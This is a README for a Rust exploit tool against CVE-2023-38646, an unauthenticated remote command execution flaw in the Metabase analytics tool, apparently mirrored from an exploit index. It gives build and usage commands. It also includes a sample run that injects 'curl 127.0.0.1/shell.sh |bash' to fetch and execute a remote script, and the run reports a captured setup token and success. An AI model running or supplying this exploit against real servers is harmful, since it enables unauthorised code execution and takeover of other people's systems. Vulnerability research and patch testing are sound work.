Share
## https://sploitus.com/exploit?id=5C4BFB25-8EF6-579D-971B-C9E3E41A5CD7
# CVE-2023-38646

<p align="left">
	<a href="https://www.rust-lang.org/"><img src="https://img.shields.io/badge/made%20with-Rust-red"></a>
	<a href="#"><img src="https://img.shields.io/badge/platform-osx%2Flinux%2Fwindows-blueviolet"></a>
</p>

- [Overview](#overview)
- [Compile](#compile)
- [Usage](#usage)
- [Running CVE-2023-38646](#running-cve-2023-38646)

# Overview

Metabase is an open source business intelligence tool that lets you create charts and dashboards using data from a variety of databases and data sources. 
This vulnerability, designated as CVE-2023โ€“38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication


# Compile

First perform the compilation with the command:

```sh
cargo build --release
```

# Usage

You can do it in these two ways:
```sh
cargo run -- --url http://localhost --command "curl <ip>" 
```

```sh
.\target\release\cve_2023_38646 --url http://localhost --command "curl <ip>" 
```

This will display help for the tool. Here are all the switches it supports:

```yaml
CVE-2023-38646

Usage: cve_2023_38646 --url <URL> --command <COMMAND>

Options:
  -u, --url <URL>          Insert URL
  -c, --command <COMMAND>  Insert command
  -h, --help               Print help
```

# Running CVE-2023-38646

```console
cargo run -- --url http://example.com --command "curl 127.0.0.1/shell.sh |bash"

[+] Token: 7cdac991-5fbd-4c3c-b6a7-0c80b3f66abc
[+] Exploit Success!
```